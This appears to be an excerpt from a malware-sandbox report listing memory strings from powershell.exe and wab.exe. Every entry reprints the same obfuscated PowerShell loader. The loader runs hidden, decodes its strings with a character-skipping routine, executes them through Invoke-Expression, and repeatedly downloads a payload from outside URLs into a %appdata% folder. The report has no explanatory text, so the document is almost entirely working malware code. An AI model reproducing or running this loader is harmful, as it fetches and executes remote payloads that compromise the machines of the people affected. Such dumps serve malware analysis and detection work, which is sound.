              Source: wab.exe, 0000000A.00000002.4231459057.000000000A087000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exer='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Host Application = powershell.exe -windowstyle hidden If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF
              Source: powershell.exe, 00000002.00000002.2360203175.0000020B5AC65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
              Source: powershell.exe, 00000005.00000002.2196876058.0000000002C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshi
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2202717320.0000000007397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2206269200.000000000C162000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(K
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i 